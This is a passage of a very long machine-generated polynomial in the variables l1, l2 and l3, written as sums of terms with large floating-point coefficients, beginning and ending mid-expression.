8.46778807510229e+29*l1**10*l2**14 - 1.58995245054999e+34*l1**10*l2**13*l3**5 + 1.85402463920441e+31*l1**10*l2**13*l3**4 - 2.48796566383925e+32*l1**10*l2**13*l3**3 - 1.48401495681038e+32*l1**10*l2**13*l3**2 + 2.07365961005989e+30*l1**10*l2**13*l3 + 9.44542622730181e+29*l1**10*l2**13 - 5.09483638746497e+34*l1**10*l2**12*l3**6 - 1.39475125263508e+34*l1**10*l2**12*l3**5 + 5.40571767049264e+32*l1**10*l2**12*l3**4 + 1.96533054138561e+32*l1**10*l2**12*l3**3 - 5.24561400416202e+29*l1**10*l2**12*l3**2 - 7.88571958939082e+29*l1**10*l2**12*l3 - 7.17036844407772e+27*l1**10*l2**12 - 4.20300000703496e+34*l1**10*l2**11*l3**7 - 8.78143028639824e+33*l1**10*l2**11*l3**6 - 1.48787988065949e+32*l1**10*l2**11*l3**5 - 1.12419016295835e+32*l1**10*l2**11*l3**4 + 6.69273717361124e+30*l1**10*l2**11*l3**3 + 2.47299305321518e+30*l1**10*l2**11*l3**2 - 2.97330053549353e+28*l1**10*l2**11*l3 - 9.44629880573793e+27*l1**10*l2**11 - 5.37476690007585e+34*l1**10*l2**10*l3**8 - 1.34063472212854e+34*l1**10*l2**10*l3**7 + 5.67302966380672e+32*l1**10*l2**10*l3**6 + 1.6427859519898e+32*l1**10*l2**10*l3**5 - 8.77703365902958e+29*l1**10*l2**10*l3**4 - 6.83241503664631e+29*l1**10*l2**10*l3**3 - 1.64752733484749e+28*l1**10*l2**10*l3**2 - 1.00295765736176e+27*l1**10*l2**10*l3 + 4.10928958577537e+25*l1**10*l2**10 - 5.05795023688627e+34*l1**10*l2**9*l3**9 - 1.32562761703008e+34*l1**10*l2**9*l3**8 + 2.23304659066776e+32*l1**10*l2**9*l3**7 + 2.30528181950754e+31*l1**10*l2**9*l3**6 + 6.67622911062507e+30*l1**10*l2**9*l3**5 + 2.27620551175224e+30*l1**10*l2**9*l3**4 - 7.53746809519211e+28*l1**10*l2**9*l3**3 - 2.19710914841676e+28*l1**10*l2**9*l3**2 + 2.20845982639188e+26*l1**10*l2**9*l3 + 5.93975832911145e+25*l1**10*l2**9 - 4.67443532881468e+34*l1**10*l2**8*l3**10 - 1.17555656604555e+34*l1**10*l2**8*l3**9 + 3.98680155886171e+32*l1**10*l2**8*l3**8 + 1.06398030287866e+32*l1**10*l2**8*l3**7 + 1.84853467374584e+30*l1**10*l2**8*l3**6 + 4.69654380006687e+29*l1**10*l2**8*l3**5 - 5.20745371408275e+28*l1**10*l2**8*l3**4 - 
1.28320543163029e+28*l1**10*l2**8*l3**3 + 2.32670665975944e+26*l1**10*l2**8*l3**2 + 4.92584256459492e+25*l1**10*l2**8*l3 - 1.50473333778903e+23*l1**10*l2**8 - 3.87557225943234e+34*l1**10*l2**7*l3**11 - 1.02548551506101e+34*l1**10*l2**7*l3**10 + 3.70027299514017e+32*l1**10*l2**7*l3**9 + 6.32190507474849e+31*l1**10*l2**7*l3**8 + 3.72522324926454e+30*l1**10*l2**7*l3**7 + 1.42727805811916e+30*l1**10*l2**7*l3**6 - 8.82482211301911e+28*l1**10*l2**7*l3**5 - 2.56979751924255e+28*l1**10*l2**7*l3**4 + 5.14015581695766e+26*l1**10*l2**7*l3**3 + 1.3899620870074e+26*l1**10*l2**7*l3**2 - 8.99927668367576e+23*l1**10*l2**7*l3 - 2.21425880476561e+23*l1**10*l2**7 - 2.59365220438933e+34*l1**10*l2**6*l3**12 - 8.68593052668082e+33*l1**10*l2**6*l3**11 + 1.41794831923668e+32*l1**10*l2**6*l3**10 + 8.42803420029584e+31*l1**10*l2**6*l3**9 + 3.57413845722403e+30*l1**10*l2**6*l3**8 + 7.8472256863229e+29*l1**10*l2**6*l3**7 - 7.78142517562873e+28*l1**10*l2**6*l3**6 - 2.15372182623327e+28*l1**10*l2**6*l3**5 + 5.24301892335031e+26*l1**10*l2**6*l3**4 + 1.41319415913794e+26*l1**10*l2**6*l3**3 - 1.24997157374399e+24*l1**10*l2**6*l3**2 - 3.01104775528053e+23*l1**10*l2**6*l3 + 3.94774153166886e+20*l1**10*l2**6 - 2.39033138913419e+34*l1**10*l2**5*l3**13 - 3.74268105940225e+33*l1**10*l2**5*l3**12 + 3.57743582637434e+32*l1**10*l2**5*l3**11 + 6.38358544695794e+30*l1**10*l2**5*l3**10 + 7.63577027612233e+29*l1**10*l2**5*l3**9 + 1.08553721020016e+30*l1**10*l2**5*l3**8 - 6.69859493529663e+28*l1**10*l2**5*l3**7 - 2.2327167429171e+28*l1**10*l2**5*l3**6 + 5.86586280937862e+26*l1**10*l2**5*l3**5 + 1.70474728639023e+26*l1**10*l2**5*l3**4 - 1.97237207516336e+24*l1**10*l2**5*l3**3 - 5.31245094168354e+23*l1**10*l2**5*l3**2 + 2.09027199134532e+21*l1**10*l2**5*l3 + 4.88063796697583e+20*l1**10*l2**5 - 6.25010085095294e+33*l1**10*l2**4*l3**14 - 5.49735796322148e+33*l1**10*l2**4*l3**13 - 1.05716645887834e+32*l1**10*l2**4*l3**12 + 7.81590961918642e+31*l1**10*l2**4*l3**11 + 4.09349400072884e+30*l1**10*l2**4*l3**10 + 
2.19406407879245e+29*l1**10*l2**4*l3**9 - 6.71012601347745e+28*l1**10*l2**4*l3**8 - 1.59440068958035e+28*l1**10*l2**4*l3**7 + 5.37417895558993e+26*l1**10*l2**4*l3**6 + 1.48504126525017e+26*l1**10*l2**4*l3**5 - 2.07716750009739e+24*l1**10*l2**4*l3**4 - 5.72834890927646e+23*l1**10*l2**4*l3**3 + 3.08610330319503e+21*l1**10*l2**4*l3**2 + 7.62322493639937e+20*l1**10*l2**4*l3 - 5.81042455048143e+17*l1**10*l2**4 - 9.81450347642025e+33*l1**10*l2**3*l3**15 + 3.78350958043275e+32*l1**10*l2**3*l3**14 + 2.26349951946377e+32*l1**10*l2**3*l3**13 - 4.47030403973971e+31*l1**10*l2**3*l3**12 - 1.14121549368907e+30*l1**10*l2**3*l3**11 + 9.43908729481557e+29*l1**10*l2**3*l3**10 - 2.5310400492471e+28*l1**10*l2**3*l3**9 - 1.40327941695848e+28*l1**10*l2**3*l3**8 + 3.50744010534919e+26*l1**10*l2**3*l3**7 + 1.20675180379823e+26*l1**10*l2**3*l3**6 - 1.79149633749679e+24*l1**10*l2**3*l3**5 - 5.3559928030561e+23*l1**10*l2**3*l3**4 + 3.73768574255279e+21*l1**10*l2**3*l3**3 + 1.01359701883699e+21*l1**10*l2**3*l3**2 - 2.34080091928516e+18*l1**10*l2**3*l3 - 4.89959398801245e+17*l1**10*l2**3 - 6.93746146816443e+32*l1**10*l2**2*l3**16 - 2.11728614322774e+33*l1**10*l2**2*l3**15 - 9.30191603871154e+31*l1**10*l2**2*l3**14 + 4.71852889917621e+31*l1**10*l2**2*l3**13 + 2.54509577028868e+30*l1**10*l2**2*l3**12 - 2.30503782551933e+29*l1**10*l2**2*l3**11 - 3.72041262865546e+28*l1**10*l2**2*l3**10 - 4.87084428433767e+27*l1**10*l2**2*l3**9 + 3.02855120168663e+26*l1**10*l2**2*l3**8 + 6.821735279005e+25*l1**10*l2**2*l3**7 - 1.41347764967504e+24*l1**10*l2**2*l3**6 - 3.74605284676675e+23*l1**10*l2**2*l3**5 + 3.30663886849496e+21*l1**10*l2**2*l3**4 + 8.89647083716643e+20*l1**10*l2**2*l3**3 - 2.94576635139604e+18*l1**10*l2**2*l3**2 - 6.65924712748741e+17*l1**10*l2**2*l3 + 391679878483709.0*l1**10*l2**2 - 1.32874542126762e+33*l1**10*l2*l3**17 + 3.69455637671892e+32*l1**10*l2*l3**16 + 4.57282064901339e+31*l1**10*l2*l3**15 - 2.33145888387251e+31*l1**10*l2*l3**14 - 5.4347371322419e+29*l1**10*l2*l3**13 + 
4.31123549423246e+29*l1**10*l2*l3**12 - 1.85880842056685e+27*l1**10*l2*l3**11 - 5.08864228111812e+27*l1**10*l2*l3**10 + 7.43205523436781e+25*l1**10*l2*l3**9 + 4.14728042183259e+25*l1**10*l2*l3**8 - 5.76971098386353e+23*l1**10*l2*l3**7 - 2.11499929453974e+23*l1**10*l2*l3**6 + 1.84706093187854e+21*l1**10*l2*l3**5 + 5.61314885632085e+20*l1**10*l2*l3**4 - 2.35740265511075e+18*l1**10*l2*l3**3 - 5.78767514660061e+17*l1**10*l2*l3**2 + 852915135537584.0*l1**10*l2*l3 + 114983350489849.0*l1**10*l2 - 1.77462196672432e+32*l1**10*l3**18 - 1.48821708235749e+32*l1**10*l3**17 - 1.02930954935743e+31*l1**10*l3**16 + 5.94604459958824e+30*l1**10*l3**15 + 4.19076240485169e+29*l1**10*l3**14 - 7.38437124894271e+28*l1**10*l3**13 - 8.21983209893479e+27*l1**10*l3**12 - 2.74434261499295e+26*l1**10*l3**11 + 7.5767360663961e+25*l1**10*l3**10 + 8.505743157441e+24*l1**10*l3**9 - 3.91014148531005e+23*l1**10*l3**8 - 6.38189381194547e+22*l1**10*l3**7 + 1.06500790074812e+21*l1**10*l3**6 + 2.02336795224265e+20*l1**10*l3**5 - 1.35321211717792e+18*l1**10*l3**4 - 2.5652563919027e+17*l1**10*l3**3 + 616719227202752.0*l1**10*l3**2 + 89666423758957.4*l1**10*l3 - 40697398288.1142*l1**10 - 1.63025347130871e+32*l1**9*l2**19 + 1.86735096185666e+33*l1**9*l2**18*l3 - 2.992925488999e+32*l1**9*l2**18 + 4.02543786294263e+33*l1**9*l2**17*l3**2 + 2.37934827821373e+33*l1**9*l2**17*l3 + 3.37452202820942e+31*l1**9*l2**17 + 6.11456104429537e+32*l1**9*l2**16*l3**3 - 3.11196286610361e+33*l1**9*l2**16*l3**2 - 2.12041762848947e+30*l1**9*l2**16*l3 + 3.14555841736664e+31*l1**9*l2**16 + 2.00959835091656e+34*l1**9*l2**15*l3**4 + 8.08044905690771e+33*l1**9*l2**15*l3**3 - 8.25250706253553e+31*l1**9*l2**15*l3**2 - 8.09606578929614e+31*l1**9*l2**15*l3 - 8.23933008956313e+29*l1**9*l2**15 + 3.72331902311322e+33*l1**9*l2**14*l3**5 - 3.27715096434851e+33*l1**9*l2**14*l3**4 + 2.04975991687543e+32*l1**9*l2**14*l3**3 + 1.49164092368506e+32*l1**9*l2**14*l3**2 - 1.07406893341018e+30*l1**9*l2**14*l3 - 7.44791398897886e+29*l1**9*l2**14 + 
2.79658433523375e+34*l1**9*l2**13*l3**6 + 9.13894220739174e+33*l1**9*l2**13*l3**5 - 4.31136964029205e+32*l1**9*l2**13*l3**4 - 2.01427445449569e+32*l1**9*l2**13*l3**3 + 4.22362341133729e+29*l1**9*l2**13*l3**2 + 9.81653357268591e+29*l1**9*l2**13*l3 + 8.0123912140802e+27*l1**9*l2**13 + 2.41275847963356e+34*l1**9*l2**12*l3**7 + 3.44481276123597e+33*l1**9*l2**12*l3**6 + 2.57554655530336e+32*l1**9*l2**12*l3**5 + 1.63306562364697e+32*l1**9*l2**12*l3**4 - 5.499225538082e+30*l1**9*l2**12*l3**3 - 2.43788702755043e+30*l1**9*l2**12*l3**2 + 2.1608362138186e+28*l1**9*l2**12*l3 + 8.1098645220677e+27*l1**9*l2**12 + 2.18790454802373e+34*l1**9*l2**11*l3**8 + 6.6395071041644e+33*l1**9*l2**11*l3**7 - 4.52793461043652e+32*l1**9*l2**11*l3**6 - 1.67097717083604e+32*l1**9*l2**11*l3**5 + 2.27956356824756e+30*l1**9*l2**11*l3**4 + 1.50823793281779e+30*l1**9*l2**11*l3**3 + 9.49689992078399e+27*l1**9*l2**11*l3**2 - 2.85538620743305e+27*l1**9*l2**11*l3 - 5.36538862247938e+25*l1**9*l2**11 + 3.86294001608347e+34*l1**9*l2**10*l3**9 + 7.62861175838067e+33*l1**9*l2**10*l3**8 - 6.79019836768346e+31*l1**9*l2**10*l3**7 + 3.25481559883066e+31*l1**9*l2**10*l3**6 - 6.51236719312184e+30*l1**9*l2**10*l3**5 - 2.43955055608735e+30*l1**9*l2**10*l3**4 + 6.61387501802429e+28*l1**9*l2**10*l3**3 + 2.07194124276906e+28*l1**9*l2**10*l3**2 - 1.99889509781405e+26*l1**9*l2**10*l3 - 5.687299495149e+25*l1**9*l2**10 + 1.61187425131541e+34*l1**9*l2**9*l3**10 + 6.25296045768907e+33*l1**9*l2**9*l3**9 - 2.60444980170023e+32*l1**9*l2**9*l3**8 - 7.94299631191171e+31*l1**9*l2**9*l3**7 + 8.98857915726429e+28*l1**9*l2**9*l3**6 + 3.26690088670211e+29*l1**9*l2**9*l3**5 + 3.00435994651791e+28*l1**9*l2**9*l3**4 + 4.17226352159017e+27*l1**9*l2**9*l3**3 - 1.88935308943064e+26*l1**9*l2**9*l3**2 - 2.52458833962446e+25*l1**9*l2**9*l3 + 2.34974968126066e+23*l1**9*l2**9 + 3.30206841139379e+34*l1**9*l2**8*l3**11 + 6.12790124853529e+33*l1**9*l2**8*l3**10 - 2.14858029593e+32*l1**9*l2**8*l3**9 - 4.36388293508253e+31*l1**9*l2**8*l3**8 - 
3.96851453548408e+30*l1**9*l2**8*l3**7 - 1.27279243301646e+30*l1**9*l2**8*l3**6 + 8.03273190672382e+28*l1**9*l2**8*l3**5 + 2.26925428671792e+28*l1**9*l2**8*l3**4 - 5.03619966305391e+26*l1**9*l2**8*l3**3 - 1.32685652946645e+26*l1**9*l2**8*l3**2 + 1.0135601438162e+24*l1**9*l2**8*l3 + 2.43540227874266e+23*l1**9*l2**8 + 1.29859461626351e+34*l1**9*l2**7*l3**12 + 4.86594013798349e+33*l1**9*l2**7*l3**11 - 2.19109755296524e+32*l1**9*l2**7*l3**10 - 3.14533191853608e+31*l1**9*l2**7*l3**9 - 1.17497180193706e+30*l1**9*l2**7*l3**8 - 5.84348731008554e+29*l1**9*l2**7*l3**7 + 5.67415895688501e+28*l1**9*l2**7*l3**6 + 1.50878817973642e+28*l1**9*l2**7*l3**5 - 4.60286167980991e+26*l1**9*l2**7*l3**4 - 1.09492287811415e+26*l1**9*l2**7*l3**3 + 1.33185437247802e+24*l1**9*l2**7*l3**2 + 2.65936981771487e+23*l1**9*l2**7*l3 - 7.53583706783146e+20*l1**9*l2**7 + 1.52150512581967e+34*l1**9*l2**6*l3**13 + 4.39981035841031e+33*l1**9*l2**6*l3**12 - 2.72060747862779e+31*l1**9*l2**6*l3**11 - 6.22630185732058e+31*l1**9*l2**6*l3**10 - 3.4052484184889e+30*l1**9*l2**6*l3**9 - 4.69598071157878e+29*l1**9*l2**6*l3**8 + 7.18433748515249e+28*l1**9*l2**6*l3**7 + 1.82928350069628e+28*l1**9*l2**6*l3**6 - 6.1978586431602e+26*l1**9*l2**6*l3**5 - 1.61687036114508e+26*l1**9*l2**6*l3**4 + 2.33612157989806e+24*l1**9*l2**6*l3**3 + 5.74744441440063e+23*l1**9*l2**6*l3**2 - 3.04525513459068e+21*l1**9*l2**6*l3 - 6.55889932560576e+20*l1**9*l2**6 + 1.09570135386017e+34*l1**9*l2**5*l3**14 + 8.4830372642774e+32*l1**9*l2**5*l3**13 - 2.68873066472922e+32*l1**9*l2**5*l3**12 + 2.81583869972414e+31*l1**9*l2**5*l3**11 + 6.84180640143748e+29*l1**9*l2**5*l3**10 - 8.93087075006033e+29*l1**9*l2**5*l3**9 + 4.33635560585086e+28*l1**9*l2**5*l3**8 + 1.62163806071332e+28*l1**9*l2**5*l3**7 - 5.21107952736678e+26*l1**9*l2**5*l3**6 - 1.46925013940636e+26*l1**9*l2**5*l3**5 + 2.46229464752974e+24*l1**9*l2**5*l3**4 + 6.21328097681057e+23*l1**9*l2**5*l3**3 - 4.46658912499581e+21*l1**9*l2**5*l3**2 - 9.45298371612372e+20*l1**9*l2**5*l3 + 
1.41287316905438e+18*l1**9*l2**5 + 2.12493767348476e+33*l1**9*l2**4*l3**15 + 3.62371864286257e+33*l1**9*l2**4*l3**14 + 1.45315142193695e+32*l1**9*l2**4*l3**13 - 7.68652414087374e+31*l1**9*l2**4*l3**12 - 3.89469051610746e+30*l1**9*l2**4*l3**11 + 2.27137129623771e+29*l1**9*l2**4*l3**10 + 5.77214769619085e+28*l1**9*l2**4*l3**9 + 9.79477074029616e+27*l1**9*l2**4*l3**8 - 5.14633566390933e+26*l1**9*l2**4*l3**7 - 1.25069365924498e+26*l1**9*l2**4*l3**6 + 2.5659431596221e+24*l1**9*l2**4*l3**5 + 6.55427105217793e+23*l1**9*l2**4*l3**4 - 6.06128811158765e+21*l1**9*l2**4*l3**3 - 1.44836653916876e+21*l1**9*l2**4*l3**2 + 4.78869605661596e+18*l1**9*l2**4*l3 + 9.06395602710966e+17*l1**9*l2**4 + 5.09509736128361e+33*l1**9*l2**3*l3**16 - 1.21855894345887e+33*l1**9*l2**3*l3**15 - 1.75560102654075e+32*l1**9*l2**3*l3**14 + 5.80377976622248e+31*l1**9*l2**3*l3**13 + 1.72663521408425e+30*l1**9*l2**3*l3**12 - 9.40694164846423e+29*l1**9*l2**3*l3**11 + 9.71431776212713e+27*l1**9*l2**3*l3**10 + 1.12387620816293e+28*l1**9*l2**3*l3**9 - 2.65217318080354e+26*l1**9*l2**3*l3**8 - 1.00924905728606e+26*l1**9*l2**3*l3**7 + 1.88281720767657e+24*l1**9*l2**3*l3**6 + 5.46856876436986e+23*l1**9*l2**3*l3**5 - 5.69542848462483e+21*l1**9*l2**3*l3**4 - 1.4475013438983e+21*l1**9*l2**3*l3**3 + 6.37331774042249e+18*l1**9*l2**3*l3**2 + 1.27401157716858e+18*l1**9*l2**3*l3 - 1.1824747771353e+15*l1**9*l2**3 + 1.17493744730555e+32*l1**9*l2**2*l3**17 + 1.55178364141588e+33*l1**9*l2**2*l3**16 + 7.66179279982795e+31*l1**9*l2**2*l3**15 - 4.61404487788782e+31*l1**9*l2**2*l3**14 - 2.13711255133302e+30*l1**9*l2**2*l3**13 + 4.2726002667155e+29*l1**9*l2**2*l3**12 + 3.20811891495294e+28*l1**9*l2**2*l3**11 + 1.49921565984888e+27*l1**9*l2**2*l3**10 - 2.8322943589346e+26*l1**9*l2**2*l3**9 - 4.74248513393355e+25*l1**9*l2**2*l3**8 + 1.54653565139752e+24*l1**9*l2**2*l3**7 + 3.50913702909298e+23*l1**9*l2**2*l3**6 - 4.71400958137219e+21*l1**9*l2**2*l3**5 - 1.13849170136788e+21*l1**9*l2**2*l3**4 + 6.59836164865505e+18*l1**9*l2**2*l3**3 
+ 1.41860619799083e+18*l1**9*l2**2*l3**2 - 2.83660529447828e+15*l1**9*l2**2*l3 - 370084626157067.0*l1**9*l2**2 + 5.77029770907359e+32*l1**9*l2*l3**18 - 3.99889627032392e+32*l1**9*l2*l3**17 - 2.91177371132018e+31*l1**9*l2*l3**16 + 2.16951190630005e+31*l1**9*l2*l3**15 + 5.04275487563916e+29*l1**9*l2*l3**14 - 3.97365811351966e+29*l1**9*l2*l3**13 - 1.37927241225307e+27*l1**9*l2*l3**12 + 4.35345377195304e+27*l1**9*l2*l3**11 - 4.13693569801408e+25*l1**9*l2*l3**10 - 3.55420377227319e+25*l1**9*l2*l3**9 + 5.02814708790841e+23*l1**9*l2*l3**8 + 2.01881698388734e+23*l1**9*l2*l3**7 - 2.24846846013686e+21*l1**9*l2*l3**6 - 6.67233090717018e+20*l1**9*l2*l3**5 + 4.23347178601544e+18*l1**9*l2*l3**4 + 9.83487583539651e+17*l1**9*l2*l3**3 - 2.79351789182419e+15*l1**9*l2*l3**2 - 409664252584361.0*l1**9*l2*l3 + 264533088872.745*l1**9*l2 + 9.98363672143404e+31*l1**9*l3**19 + 1.04894817188327e+32*l1**9*l3**18 + 5.77846313378882e+30*l1**9*l3**17 - 5.07222281618018e+30*l1**9*l3**16 - 2.76945290089732e+29*l1**9*l3**15 + 8.11287811604455e+28*l1**9*l3**14 + 6.36028021221888e+27*l1**9*l3**13 - 1.34092596413341e+26*l1**9*l3**12 - 6.81195011115686e+25*l1**9*l3**11 - 4.9515393851678e+24*l1**9*l3**10 + 4.18990723576747e+23*l1**9*l3**9 + 5.45384603507266e+22*l1**9*l3**8 - 1.41548958002152e+21*l1**9*l3**7 - 2.26022476920939e+20*l1**9*l3**6 + 2.3869861466071e+18*l1**9*l3**5 + 3.95442202090761e+17*l1**9*l3**4 - 1.66566922118468e+15*l1**9*l3**3 - 243499992502604.0*l1**9*l3**2 + 264533088872.748*l1**9*l3 + 18313829229.6525*l1**9 + 2.11333266750713e+32*l1**8*l2**20 - 1.29520750925568e+33*l1**8*l2**19*l3 + 2.19634455237111e+32*l1**8*l2**19 - 1.03001368844606e+33*l1**8*l2**18*l3**2 - 1.47942170940601e+33*l1**8*l2**18*l3 - 2.56594232447065e+31*l1**8*l2**18 - 1.01280052168492e+32*l1**8*l2**17*l3**3 + 2.60772813269236e+33*l1**8*l2**17*l3**2 + 2.31464695442102e+31*l1**8*l2**17*l3 - 2.02524249482489e+31*l1**8*l2**17 - 1.00140651581602e+34*l1**8*l2**16*l3**4 - 5.44123748694587e+33*l1**8*l2**16*l3**3 + 
1.67667767265274e+31*l1**8*l2**16*l3**2 + 6.11909665572335e+31*l1**8*l2**16*l3 + 6.61156339239423e+29*l1**8*l2**16 + 6.50824282602517e+32*l1**8*l2**15*l3**5 + 3.58393956974114e+33*l1**8*l2**15*l3**4 - 1.20080423864395e+32*l1**8*l2**15*l3**3 - 1.25204771939542e+32*l1**8*l2**15*l3**2 + 2.32258681959223e+29*l1**8*l2**15*l3 + 5.09304454377476e+29*l1**8*l2**15 - 1.26042025449496e+34*l1**8*l2**14*l3**6 - 4.85294697339611e+33*l1**8*l2**14*l3**5 + 2.8665824584816e+32*l1**8*l2**14*l3**4 + 1.7853158259219e+32*l1**8*l2**14*l3**3 - 3.01106662856182e+28*l1**8*l2**14*l3**2 - 9.3644422558117e+29*l1**8*l2**14*l3 - 7.18738507804962e+27*l1**8*l2**14 - 1.30189843375475e+34*l1**8*l2**13*l3**7 - 2.38487037316335e+33*l1**8*l2**13*l3**6 - 2.55461602203792e+32*l1**8*l2**13*l3**5 - 1.71648786811135e+32*l1**8*l2**13*l3**4 + 3.62380602228621e+30*l1**8*l2**13*l3**3 + 2.13766947135953e+30*l1**8*l2**13*l3**2 - 1.15564653106946e+28*l1**8*l2**13*l3 - 6.01025032150012e+27*l1**8*l2**13 - 5.9876833473629e+33*l1**8*l2**12*l3**8 - 1.79056395808807e+19*l1**8*l2**12*l3**7 + 3.36429303093262e+32*l1**8*l2**12*l3**6 + 1.52335033452495e+32*l1**8*l2**12*l3**5 - 2.65340093381237e+30*l1**8*l2**12*l3**4 - 1.94957329324001e+30*l1**8*l2**12*l3**3 - 4.97236016601412e+27*l1**8*l2**12*l3**2 + 5.14447348089231e+27*l1**8*l2**12*l3 + 5.43336456134796e+25*l1**8*l2**12 - 1.94283902705572e+34*l1**8*l2**11*l3**9 - 7.46944549218493e+33*l1**8*l2**11*l3**8 - 4.60238708938332e+31*l1**8*l2**11*l3**7 - 5.40234912795836e+31*l1**8*l2**11*l3**6 + 5.53852719281074e+30*l1**8*l2**11*l3**5 + 2.45518453087999e+30*l1**8*l2**11*l3**4 - 4.86403767691958e+28*l1**8*l2**11*l3**3 - 1.80176029519051e+28*l1**8*l2**11*l3**2 + 1.41099021980177e+26*l1**8*l2**11*l3 + 4.65326689978182e+25*l1**8*l2**11 - 1.23947571739081e+34*l1**8*l2**10*l3**10 + 1.50071050984537e+33*l1**8*l2**10*l3**9 + 1.7554457794649e+32*l1**8*l2**10*l3**8 + 4.30464285972372e+31*l1**8*l2**10*l3**7 - 1.50787680489109e+30*l1**8*l2**10*l3**6 - 1.01021496697876e+30*l1**8*l2**10*l3**5 - 
8.54064033373533e+27*l1**8*l2**10*l3**4 + 3.90630687391363e+27*l1**8*l2**10*l3**3 + 1.23450158416715e+26*l1**8*l2**10*l3**2 - 2.4044125904763e+21*l1**8*l2**10*l3 - 2.72157543367229e+23*l1**8*l2**10 - 6.24032821434022e+33*l1**8*l2**9*l3**11 - 7.12837492176553e+33*l1**8*l2**9*l3**10 + 9.17292807942645e+31*l1**8*l2**9*l3**9 + 3.55506727624605e+31*l1**8*l2**9*l3**8 + 3.17535796889477e+30*l1**8*l2**9*l3**7 + 1.19365647862595e+30*l1**8*l2**9*l3**6 - 6.25350118476677e+28*l1**8*l2**9*l3**5 - 1.9153360108362e+28*l1**8*l2**9*l3**4 + 4.07790948431369e+26*l1**8*l2**9*l3**3 + 1.13618497346053e+26*l1**8*l2**9*l3**2 - 8.91439698635152e+23*l1**8*l2**9*l3 - 2.24736062875927e+23*l1**8*l2**9 - 1.9630506164139e+34*l1**8*l2**8*l3**12 + 8.1856936900656e+32*l1**8*l2**8*l3**11 + 1.16207978311105e+32*l1**8*l2**8*l3**10 + 8.08815658836474e+30*l1**8*l2**8*l3**9 + 9.77089659974251e+29*l1**8*l2**8*l3**8 + 1.01746227073522e+29*l1**8*l2**8*l3**7 - 3.37668263469903e+28*l1**8*l2**8*l3**6 - 6.37052896587105e+27*l1**8*l2**8*l3**5 + 3.10951068219509e+26*l1**8*l2**8*l3**4 + 5.72014668017754e+25*l1**8*l2**8*l3**3 - 1.11366695326489e+24*l1**8*l2**8*l3**2 - 1.69237484985048e+23*l1**8*l2**8*l3 + 1.02517290212832e+21*l1**8*l2**8 + 9.38672851923458e+32*l1**8*l2**7*l3**13 - 4.19516801615866e+33*l1**8*l2**7*l3**12 + 1.07991550104918e+32*l1**8*l2**7*l3**11 + 2.18374619961329e+31*l1**8*l2**7*l3**10 + 7.18037359968163e+29*l1**8*l2**7*l3**9 + 5.55646095311101e+29*l1**8*l2**7*l3**8 - 4.78273698823278e+28*l1**8*l2**7*l3**7 - 1.4137784074885e+28*l1**8*l2**7*l3**6 + 5.06933011844077e+26*l1**8*l2**7*l3**5 + 1.31954713972132e+26*l1**8*l2**7*l3**4 - 2.18082119324214e+24*l1**8*l2**7*l3**3 - 5.19766478031497e+23*l1**8*l2**7*l3**2 + 3.35959522683324e+21*l1**8*l2**7*l3 + 7.16808762421722e+20*l1**8*l2**7 - 1.06252436308677e+34*l1**8*l2**6*l3**14 - 7.870859317371e+32*l1**8*l2**6*l3**13 - 2.20094575732149e+31*l1**8*l2**6*l3**12 + 3.70459030169021e+31*l1**8*l2**6*l3**11 + 2.5870500152729e+30*l1**8*l2**6*l3**10 + 
3.74288859159088e+28*l1**8*l2**6*l3**9 - 4.67928274107467e+28*l1**8*l2**6*l3**8 - 9.38157521978152e+27*l1**8*l2**6*l3**7 + 4.5636813315053e+26*l1**8*l2**6*l3**6 + 1.0630006544513e+26*l1**8*l2**6*l3**5 - 2.2922445925636e+24*l1**8*l2**6*l3**4 - 5.11444875580028e+23*l1**8*l2**6*l3**3 + 4.89622499871884e+21*l1**8*l2**6*l3**2 + 8.85348056093136e+20*l1**8*l2**6*l3 - 2.38242186080792e+18*l1**8*l2**6 - 2.41656203422434e+33*l1**8*l2**5*l3**15 - 2.08015567673362e+32*l1**8*l2**5*l3**14 + 1.75972005024593e+32*l1**8*l2**5*l3**13 - 3.9641741756382e+31*l1**8*l2**5*l3**12 - 1.49737444968715e+30*l1**8*l2**5*l3**11 + 7.81321035955884e+29*l1**8*l2**5*l3**10 - 2.04700020574099e+28*l1**8*l2**5*l3**9 - 1.12072467681887e+28*l1**8*l2**5*l3**8 + 3.87477973166535e+26*l1**8*l2**5*l3**7 + 1.14087455465824e+26*l1**8*l2**5*l3**6 - 2.52253139636031e+24*l1**8*l2**5*l3**5 - 6.30820906412335e+23*l1**8*l2**5*l3**4 + 7.15798071971924e+21*l1**8*l2**5*l3**3 + 1.59779850397627e+21*l1**8*l2**5*l3**2 - 7.00766431282022e+18*l1**8*l2**5*l3 - 1.28795054342675e+18*l1**8*l2**5 - 1.31714041528997e+33*l1**8*l2**4*l3**16 - 2.10489266315976e+33*l1**8*l2**4*l3**15 - 1.23663440037677e+32*l1**8*l2**4*l3**14 + 6.84612216508113e+31*l1**8*l2**4*l3**13 + 3.24437646604653e+30*l1**8*l2**4*l3**12 - 5.40985395126669e+29*l1**8*l2**4*l3**11 - 4.4093343260844e+28*l1**8*l2**4*l3**10 - 3.56852253574686e+27*l1**8*l2**4*l3**9 + 4.02882721340639e+26*l1**8*l2**4*l3**8 + 7.93124308559087e+25*l1**8*l2**4*l3**7 - 2.35674733466588e+24*l1**8*l2**4*l3**6 - 5.48947882979692e+23*l1**8*l2**4*l3**5 + 7.49392586955509e+21*l1**8*l2**4*l3**4 + 1.68210211087916e+21*l1**8*l2**4*l3**3 - 9.75599716360444e+18*l1**8*l2**4*l3**2 - 1.71780770726495e+18*l1**8*l2**4*l3 + 2.47571752053413e+15*l1**8*l2**4 - 1.91232730081307e+33*l1**8*l2**3*l3**17 + 1.21166257148555e+33*l1**8*l2**3*l3**16 + 1.13037262568738e+32*l1**8*l2**3*l3**15 - 5.68703618259477e+31*l1**8*l2**3*l3**14 - 1.7393509384434e+30*l1**8*l2**3*l3**13 + 8.8584908867704e+29*l1**8*l2**3*l3**12 + 
